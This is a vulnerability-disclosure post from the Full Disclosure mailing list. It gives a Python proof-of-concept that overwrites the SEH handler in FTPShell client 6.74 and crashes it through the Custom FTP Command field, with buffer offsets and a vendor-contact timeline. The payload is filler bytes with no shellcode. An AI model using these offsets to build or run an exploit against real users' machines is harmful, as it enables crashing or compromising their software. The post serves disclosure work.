[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJqg1wd5JBn0o8u3Rer4gdGG8+4rGx+u3ik+R7bKW3YDRQfwmg@mail.gmail.com>
Date: Wed, 11 Sep 2019 09:23:41 +0600
From: Debashis Pal <debashis.pals@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] FTPShell client 6.74 - Local Buffer Overflow (SEH)
#!/usr/bin/python
# Exploit Type : DOS
# Exploit Title: FTPShell client 6.74 - Local Buffer Overflow (SEH)
# Vulnerable Software & version : FTPShell client 6.74
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadclient.htm
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7
Professional SP1(32-bit)
# Exploit Author: Debashis Pal
# Timeline
# Vulnerability Discover Date: 03-Sep-2019
# Vulnerability Report to Vendor:03-Sep-2019,No responds
# Again email to Vendor:05-Sep-2019 ,No responds
# Public Disclose : 09-Sep-2019
# PoC
# 1. FTPShellclient6-74POC.txt from POC.py code, open in
notepad(FTPShellclient6-74POC.txt), copy contents
# 2. Open Core FTPShell client 6.74 & connect to a FTP server
(FTPShell client 6.74 i.e. FTP session need to active along with
username & password)
# 3. From FTPShell client 6.74 menu bar select the Tools-> Custom FTP Command
# 4. paste contents from notepad (into "Custom FTP Command" input field)
# 5. Application will crash and SEH overwritten
crash = "\x41" * 396 #Junk
crash += "\x43" * 4 #nSEH
crash += "\x42" * 4 #SEH
crash += "\x44" * 96 #More Junk
file="FTPShellclient6-74POC.txt"
generate=open(file, "w")
generate.write(crash)
generate.close
Attachment# Application crash and SEH overwritten.jpg
Thanks.
Download attachment "Application crash and SEH overwritten.jpg" of type "image/jpeg" (389969 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists